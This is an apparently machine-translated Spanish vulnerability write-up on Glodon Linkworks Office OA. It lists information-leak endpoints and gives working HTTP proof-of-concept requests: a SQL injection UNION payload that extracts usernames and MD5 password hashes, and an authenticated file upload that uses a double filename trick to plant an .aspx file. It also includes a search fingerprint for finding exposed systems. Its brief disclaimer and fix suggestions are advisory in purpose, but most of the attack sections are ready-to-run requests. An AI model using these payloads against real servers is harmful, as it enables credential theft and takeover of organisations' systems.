Directorio de artículos
- declaración
- Hay fuga de información en Glodon OA
- 1. Descripción general de la vulnerabilidad
- 2. Recurrencia de vulnerabilidades
- 3. Sugerencias de reparación
- Vulnerabilidad de inyección SQL OA de Glodon Linkworks office + vulnerabilidad de carga de archivos en segundo plano
- 1. Introducción del producto
- 2. Descripción general de la vulnerabilidad
- 3. Entorno de recurrencia
- 4. Sugerencias de reparación
declaración
No utilice las tecnologías relevantes de este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo son responsabilidad del propio usuario. Todas las consecuencias adversas y El autor del artículo es irrelevante. Este artículo es sólo para fines educativos.
Hay fuga de información en Glodon OA
1. Descripción general de la vulnerabilidad
Existe una fuga de información en la oficina OA de Glodon Linkworks, un atacante puede aprovechar esta vulnerabilidad para obtener la contraseña de la cuenta para iniciar sesión en el backend, provocando otros impactos.
2. Recurrencia de vulnerabilidades
La interfaz del sistema es la siguiente. Ver todos los usuarios
con URL potencialmente peligrosas. Ver todos los proyectos. Ver la contraseña de la cuenta. Después del descifrado, inicie sesión en el sistema backend de la siguiente manera.http://url/Org/service/Service.asmx
http://url/Org/service/Service.asmx/GetAllUsersXml
http://url/Org/service/Service.asmx/GetDeptXml4GEPS
http://url/Org/service/Service.asmx/GetUserXml4GEPS
3. Sugerencias de reparación
1. Deshabilite páginas o aplicaciones que filtren información confidencial.
2. Actualice a una versión segura
Vulnerabilidad de inyección SQL OA de Glodon Linkworks office + vulnerabilidad de carga de archivos en segundo plano
1. Introducción del producto
Glodon Linkworks Office OA (Automatización de oficinas) es una solución integral de automatización de oficinas diseñada para mejorar la eficiencia del trabajo y las capacidades de colaboración dentro de una organización. Proporciona una serie de funciones y herramientas para ayudar a las empresas a gestionar y procesar tareas, procesos y documentos diarios de oficina.
2. Descripción general de la vulnerabilidad
Debido a que la GetIMDictionary
interfaz OA de la oficina de Glodon Linkworks no filtraba eficazmente la entrada del usuario, se empalmaba en la declaración de consulta SQL, lo que provocaba una vulnerabilidad de inyección SQL en el sistema. Existe msgbroadcastuploadfile.aspx
una vulnerabilidad de carga de archivos en segundo plano en la interfaz. Después de que el atacante obtiene la información del administrador mediante inyección SQL, puede iniciar sesión y enviar un paquete de solicitud para obtener permisos del servidor.
3. Entorno de recurrencia
- Huella digital de Intergraph:
web.body="/Services/Identification/Server/"
visite la siguiente URL para verificar si existe la vulnerabilidad.
http://url/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
Si la situación anterior demuestra que existe la vulnerabilidad.
POC de inyección SQL
:
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: XX.XX.XX.XX:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ASP.NET_SessionId=zldmbkj4ufv4xjlkzvudfs31; GTP_IdServer_LangID=2052; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER –
Utilice el descifrado MD5 e intente iniciar sesión en el servidor.
Carga de archivos en segundo plano
POC:
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: XX.XX.XX.XX:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: 登录后的cookie
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Length: 195
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="2.aspx";filename="1.jpg"
Content-Type: application/text
123456
------WebKitFormBoundaryFfJZ4PlAZBixjELj—
4. Sugerencias de reparación
1. Restrinja el acceso a las direcciones de origen. No abra el sistema a Internet a menos que sea necesario.
2. Actualiza a la última versión